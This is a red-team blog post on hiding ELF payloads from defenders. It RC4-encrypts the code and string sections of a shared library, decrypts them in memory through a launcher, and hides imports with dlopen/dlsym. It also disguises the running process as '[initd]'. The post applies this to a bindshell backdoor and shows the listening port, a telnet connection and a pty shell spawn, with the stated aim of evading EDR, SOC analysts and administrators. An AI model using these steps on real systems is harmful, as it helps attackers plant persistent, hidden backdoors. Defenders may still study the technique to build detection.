Blue Team vs Red Team: how to run your encrypted ELF binary in memory and go undetected

Imagine finding yourself in a “hostile” environment, one where you can’t run exploits, tools and applications without worrying about prying eyes spying on you, be they a legitimate system administrator, a colleague sharing an access with you or a software solution that scans the machine you are logged in to for malicious files. Your binary should live in encrypted form in the filesystem so that no static analysis would be possible even if identified and copied somewhere else. It should be only decrypted on the fly in memory when executed, so preventing dynamic analysis too, unless the decryption key is known.

How to implement that?

On paper everything looks fine, but practically how do we implement this? With Red Timmy Security we have created the “golden frieza” project, a collection of several techniques to support on-the-fly encryption/decryption of binaries. Even though we are not ready yet to release the full project, we are going to discuss in depth one of the methods it implements, accompanied by some supporting source code.

Why is the discussion relevant both to security analysts working at SOC departments, Threat Intelligence and Red Teams? Think about a typical Red Team operation, in which tools that commonly trigger security alerts to SOC, such as “procmon” or “mimikatz”, are uploaded in a compromised machine and then launched without having the installed endpoint protection solutions or the EDR agents complaining about that. Alternatively, think about a zero-day privilege escalation exploit that an attacker wants to run locally in a just hacked system, but they don’t want it to be reverse engineered while stored in the filesystem and consequently divulged to the rest of the world.

This is exactly the kind of techniques we are going to talk about.

A short premise before to get started. All the examples and code released (github link) work with ELF binaries. Conceptually there is nothing preventing you from implementing the same techniques with Windows PE binaries, of course with the opportune adjustments.

What to encrypt?

An ELF binary file is composed of multiple sections. We are mostly interested to encrypt the “.text” section where are located the instructions that the CPU executes when the interpreter maps the binary in memory and transfers the execution control over it. To put it simple, the section “.text” contains the logic of our application that we do not want to be reverse-engineered.

Which crypto algorithm to use?

To encrypt the “.text” section we will avoid block ciphers, which would force the binary instructions into that section to be aligned to the block size. A stream cipher algorithm fits perfectly in this case, because the length of the ciphertext produced in output will be equal to the plaintext, hence there are not padding or alignment requirements to satisfy. We choose RC4 as encryption algorithm. The discussion of its security is beyond the scope of this blog post. You might implement whatever else you like in replacement.

The implementation

The technique to-be implemented must be as easy as possible. We want to avoid manual memory mappings and symbol relocations. For example, our solution could rely on two components:

  • An ELF file compiled as a dynamic library exporting one or more functions containing the encrypted instructions to be protected from prying eyes;
  • the launcher, a program that takes as an input the ELF dynamic library, decrypting it in memory by means of a crypto key and then executing it.

What is not clear yet is what we should encrypt: the full “.text” section or just the malicious functions exported in the ELF module? Let’s try to put in practice an experiment. The following source code exports a function called “testalo()” taking no parameter. After compilation we want it to be decrypted only once it is loaded in memory.

We compile the code as a dynamic library:

$ gcc testalo_mod.c -o testalo_mod.so -shared -fPIC

Now let’s have a look at its sections with “readelf”:

The “.text” section in the present case starts at file offset 0x580 (1408 bytes from the beginning of testalo_mod.so) and its size is 0x100 (256 bytes). What if we fill up this space with zeros and then try to programmatically load the library? Will it be mapped in our process memory or the interpreter will have something to complain about? As the encryption procedure creates garbage binary instructions, filling up the “.text” section of our module with zeros actually simulates that without trying your hand at encrypting the binary. We can do that by executing the command:

$ dd if=/dev/zero of=testalo_mod.so seek=1408 bs=1 count=256 conv=notrunc

…and then verifying with “xxd” that the “.text” section has been indeed entirely zeroed:

$ xxd testalo_mod.so
[...]
00000580: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000590: 0000 0000 0000 0000 0000 0000 0000 0000 ................
[...]
00000670: 0000 0000 0000 0000 0000 0000 0000 0000 ................
[...]

To spot the final behavior that we are attemping to observe, we need an application (see code snippet of “dlopen_test.c” below) that tries to map the “testalo_mod.so” module into its address space (line 12) and then, in case of success, checks if at runtime the function “testalo()” gets resolved (line 18) and executed (line 23).

Let’s compile and execute it:

$ gcc dlopen_test -o dlopen_test -ldl
$ ./dlopen_test
Segmentation fault (core dumped)

What we are observing here is that during the execution of line 12 the program crashes. Why? This happens because, even if the call to “dlopen()” in our application is not explicitly invoking anything from “testalo_mod.so”, there are functions into “testalo_mod.so” itself that are instead automatically called (such as “frame_dummy()”) during the module initialization process. A “gdb” session will help here.

$ objdump -M intel -d testalo_mod.so

Because such functions are all zeroed, this produces a segmentation fault when the execution flow is transferred over those.

What if we only encrypted the content of the “testalo()” function on which our logic resides? To do that we just recompile “testalo_mod.so” and determine the size of the function’s code with the command “objdump -M intel -d testalo_mod.so“, by observing where the function starts and where it ends :

The formula to calculate our value is 0x6800x65a = 0x26 = 38 bytes.

Finally we overwrite the library “testalo_mod.so” with 38 bytes of zeros, starting from where the “testalo()” function locates, which this time is offset 0x65a = 1626 bytes from the beginning of the file:

$ dd if=/dev/zero of=testalo_mod.so seek=1626 bs=1 count=38 conv=notrunc

Then we can launch “dlopen_test” again:

$ ./dlopen_test
Segmentation fault (core dumped)

It seems nothing has changed. But a closer look will reveal the segfault has occurred for another reason this time:

Previously we have got stuck at line 12 in “dlopen_test.c”, during the initialization of the “testalo_mod.so” dynamic library. Now instead we get stuck at line 23, when “testalo_mod.so” has been properly mapped in our process memory, the “testalo()” symbol has been already resolved from it (line 18) and the function is finally invoked (line 23), which in turn causes the crash. Of course, the binary instructions are invalid because before we have zeroed that block of memory. However if we really had put encrypted instructions there and decrypted all before the invocation of “testalo()“,  everything would have worked smoothly.

So, we know now what to encrypt and how to encrypt it: only the exported functions holding our malicious payload or application logic, not the whole text section.

Next step: a first prototype for the project

Let’s see a practical example of how to decrypt in memory our encrypted payload. We said at the beginning that two components are needed in our implementation:

  • (a) an ELF file compiled as a dynamic library exporting one or more functions containing the encrypted instructions to be protected from prying eyes;
  • (b) the launcher, a program that takes as an input the ELF dynamic library, decrypting it in memory by means of a crypto key and then executing it.

Regarding the point (a) we will continue to utilize “testalo_mod.so” for now by encrypting the “testalo()” function’s content only. Instead of using a specific program for that, just take profit of existing tools such as “dd” and “openssl”:

$ dd if=./testalo_mod.so of=./text_section.txt skip=1626 bs=1 count=38

$ openssl rc4 -e -K 41414141414141414141414141414141 -in text_section.txt -out text_section.enc -nopad

$ dd if=./text_section.enc of=testalo_mod.so seek=1626 bs=1 count=38 conv=notrunc

The first command basically extracts 38 bytes composing the binary instructions of “testalo()”. The second command encrypt these with the RC4 key “AAAAAAAAAAAAAAAA” (hex representation -> “41414141414141414141414141414141”) and the third command write back the encrypted content to the place where “testalo()” is located into the binary. If we observe the code of that function now with the command “objdump -M intel -d ./testalo_mod.so“, it will be unintelligible indeed:

The second needed component is the launcher (b). Let’s analyze its C code piece by piece. First it acquires in hexadecimal format the offset where our encrypted function is mapped (information that we retrieve with “readelf”) and its length in byte (line 102). Then the terminal echo is disabled (lines 116-125) in order to permit the user to type in safely the crypto key (line 128) and finally the terminal is restored back to the original state (lines 131-135).

Now we have the offset where our encrypted function is in memory but we do not know yet the full memory address where it is mapped. This is determined by looking at “/proc/PID/maps” as in the code snippet down.

Then all the pieces are settled to extract from the memory the encrypted binary instructions (line 199), decrypt everything with the RC4 key collected previously and write the output back to the location where “testalo()” function’s content lives (line 213). However, we could not do that without before marking that page of memory to be writable (lines 206-210) and then back again readable/executable only (lines 218-222) after the decrypted payload is written into it. This is because in order to protect the executable code against tampering at runtime, the interpreter loads it into a not writable memory region. After usage, the crypto key is also wiped out from memory (line 214).

Now the address of the decrypted “testalo()” function can be resolved (line 228) and the binary instructions it contains be executed (line 234).

This first version of the launcher’s source code is downloadable from here. Let’s compile it…

$ gcc golden_frieza_launcher_v1.c -o golden_frieza_launcher_v1 -ldl

…execute it, and see how it works (in bold the user input):

$ ./golden_frieza_launcher_v1 ./testalo_mod.so
Enter offset and len in hex (0xXX): 0x65a 0x26
Offset is 1626 bytes
Len is 38 bytes
Enter key: <-- key is inserted here but not echoed back
PID is: 28527
Module name is: testalo_mod.so
7feb51c56000-7feb51c57000 r-xp 00000000 fd:01 7602195 /tmp/testalo_mod.so
Start address is: 0x7feb51c56000
End address is 0x7feb51c57000

Execution of .text
==================
Sucalo Sucalo oh oh!
oh oh Sucalo Sucalo!!

As shown at the end of the command output, the in-memory decrypted content of the “testalo()” function is indeed successfully executed.

But…

What is the problem with this approach? It is that even though our library would be stripped, the symbols of the functions invoked by “testalo()” (such as “puts()” and “exit()”) that need to be resolved and relocated at runtime, remain well visible. In case the binary finishes in the hands of a system administrator or SOC analyst, even with the “.text” section encrypted in the filesystem, through simple static analysis tools such as “objdump” and “readelf” they could inference what is the purpose of our malicious binary.

Let’s see it with a more concrete example. Instead of using a dummy library, we decide to implement a bindshell (see the code here) and compile that code as an ELF module:

$ gcc testalo_bindshell.c –o testalo_bindshell.so –shared -fPIC

We strip the binary with the “strip” command and encrypt the relevant “.text” portion as already explained before. If now we look at symbols table (“readelf –s testalo_bindshell.so”) or relocations table (“readelf –r testalo_bindshell.so”) something very similar to the picture below appears:

This clearly reveals the usage of API such as “bind()”, “listen()”, “accept()”, “execl()”, etc… which are all functions that typically a bindshell implementation imports. This is inconvenient in our case because reveals the nature of our code. We need to get a workaround.

dlopen and dlsyms

To get around the problem, the approach we adopt is to resolve external symbols at runtime through “dlopen()” and “dlsyms()”.

For example, normally a snippet of code involving a call to “socket()” would look like this:

#include
[...]
if((srv_sockfd = socket(PF_INET, SOCK_STREAM, 0)) < 0)
[...]

When the binary is compiled and linked, the piece of code above is responsible for the creation of an entry about “socket()” in the dynamic symbols and relocations tables. As already said, we want to avoid such a condition. Therefore the piece of code above must be changed as follows:

Here “dlopen()” is invoked only once and “dlsyms()” is called for any external functions that must be resolved. In practice:

  • int (*_socket)(int, int, int);” -> we define a function pointer variable having the same prototype as the original “socket()” function.
  • handle = dlopen (NULL, RTLD_LAZY);” -> “if the first parameter is NULL the returned handle is for the main program”, as stated in the linux man page.
  • _socket = dlsym(handle, "socket");” -> the variable “_socket” will contain the address of the “socket()” function resolved at runtime with “dlsym()”.
  • (*_socket)(PF_INET, SOCK_STREAM, 0)” -> we use it as an equivalent form of “socket(PF_INET, SOCK_STREAM, 0)”. Basically the value pointed to by the variable “_socket” is the address of the “socket()” function that has been resolved with “dlsym()”.

These modifications must be repeated for all the external functions “bind()”, “listen()”, “accept()”, “execl()”, etc…

You can see the differences between the two coding styles by comparing the UNMODIFIED BINDSHELL LIBRARY and the MODIFIED ONE. After that the new library is compiled:

$ gcc testalo_bindshell_mod.c -shared -o testalo_bindshell_mod.so -fPIC

…the main effects tied to the change of coding style are the following:

In practice the only external symbols that remain visible now are “dlopen()” and “dlsyms()”. No usage of any other socket API or functions can be inferenced.

Is this enough?

This approach has some issues too. To understand that, let’s have a look at the read-only data section in the ELF dynamic library:

What’s going on? In practice, all the strings we have declared in our bindshell module are finished in clear-text inside the “.rodata” section (starting at offset 0xaf5 and ending at offset 0xbb5) which contains all the constant values declared in the C program! Why is this happening? It depends on the way how we pass string parameters to the external functions:

_socket = dlsym(handle, "socket");

What we can do to get around the issue is to encrypt the “.rodata” section as well, and decrypt it on-the-fly in memory when needed, as we have already done with the binary instructions in the “.text” section. The new version of the launcher component (golden_frieza_launcher_v2) can be downloaded here and compiled with “gcc golden_frieza_launcher_v2.c -o golden_frieza_launcher_v2 -ldl”. Let’s see how it works. First the “.text” section of our bindshell module is encrypted:

$ dd if=./testalo_bindshell_mod.so of=./text_section.txt skip=1738 bs=1 count=1055

$ openssl rc4 -e -K 41414141414141414141414141414141 -in text_section.txt -out text_section.enc –nopad

$ dd if=./text_section.enc of=./testalo_bindshell_mod.so seek=1738 bs=1 count=1055 conv=notrunc

Same thing for the “.rodata” section:

$ dd if=./testalo_bindshell_mod.so of=./rodata_section.txt skip=2805 bs=1 count=193

$ openssl rc4 -e -K 41414141414141414141414141414141 -in rodata_section.txt -out rodata_section.enc -nopad

$ dd if=./rodata_section.enc of=./testalo_bindshell_mod.so seek=2805 bs=1 count=193 conv=notrunc

Then the launcher is executed. It takes the bindshell module filename (now both with encrypted “.text” and “.rodata” sections) as a parameter:

$ ./golden_frieza_launcher_v2 ./testalo_bindshell_mod.so

The “.text” section offset and length is passed as hex values (we have already seen how to get those):

Enter .text offset and len in hex (0xXX): 0x6ca 0x41f
Offset is 1738 bytes
Len is 1055 bytes

Next the “.rodata” section offset and length is passed too as hex values. As seen in the last “readelf” screenshot above, in this case the section starts at 0xaf5 and the len is calculated like this: 0xbb50xaf5 + 1 = 0xc1:

Enter .rodata offset and len in hex (0xXX): 0xaf5 0xc1
.rodata offset is 2805 bytes
.rodata len is 193 bytes

Then the launcher asks for a command line parameter. Indeed our bindshell module (specifically the exported  “testalo()” function) takes as an input parameter the TCP port it has to listen to. We choose 9000 for this example:

Enter cmdline: 9000
Cmdline is: 9000

The encryption key (“AAAAAAAAAAAAAAAA”) is now inserted without being echoed back:

Enter key:

The final part of the output is:

PID is: 3915
Module name is: testalo_bindshell_mod.so
7f5d0942f000-7f5d09430000 r-xp 00000000 fd:01 7602214 /tmp/testalo_bindshell_mod.so
Start address is: 0x7f5d0942f000
End address is 0x7f5d09430000

Execution of .text
==================

This time below the “Execution of .text” message we get nothing. This is due to the behavior of our bindshell that does not print anything to the standard output. However, the bindshell backdoor has been launched properly in the background:

$ netstat -an | grep 9000
tcp 0 0 0.0.0.0:9000 0.0.0.0:* LISTEN

$ telnet localhost 9000
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
python -c 'import pty; pty.spawn("/bin/sh")'
$ id
uid=1000(cippalippa) gid=1000(cippalippa_group)

Last old-school trick of the day

A valuable point is: how is the process shown in the process list after the bindshell backdoor is executed?

$ ps -wuax
[...]
./golden_frieza_launcher_v2 ./testalo_bindshell_mod.so
[...]

Unfortunately the system owner could identify the process as malicious on first glance! This is not normally an issue in case our code runs for a narrowed amount of time. But what in case we want to plant a backdoor or C&C agent for a longer period of time? In that case it would be convenient to mask the process somehow. It is exactly what the piece of code below (implemented in complete form here) does.

Let’s first compile the new version of the launcher binary:

$ gcc golden_frieza_launcher_v3.c -o golden_frieza_launcher_v3 -ldl

This time the launcher takes an additional parameter beyond the encrypted dynamic library filename, which is the name we want to assign to the process. In the example below “[initd]” is used:

$ ./golden_frieza_launcher_v3 ./testalo_bindshell_mod.so "[initd]"

Indeed by means of “netstat” we can spot the PID of the process (assuming the bindshell backdoor has started on TCP port 9876):

$ netstat -tupan | grep 9876
tcp 0 0 0.0.0.0:9876 0.0.0.0:* LISTEN 19087

…and from the PID the actual process name:

$ ps -wuax | grep init
user 19087 0.0 0.0 8648 112 pts/5 S 19:56 0:00 [initd]

Well you now know should never trust the ps output! 🙂

Conclusion

What if somebody discovers the launcher binary and the encrypted ELF dynamic library in the filesystem? The encryption key is not known hence nobody could decrypt and execute our payload.

What if the offset and length of encrypted sections are entered incorrectly? This will lead most of the cases to a segfault or illegal instruction and the consequent crash of the launcher component. Again, the code does not leak out.

Can this be done on Windows machine? Well, if you think about “LoadLibrary()”, “LoadModule()” and  “GetProcAddress()”, these functions API do the same as “dlopen()” and “dlsyms()”.

That’s all for today!

Snafuz, snafuz!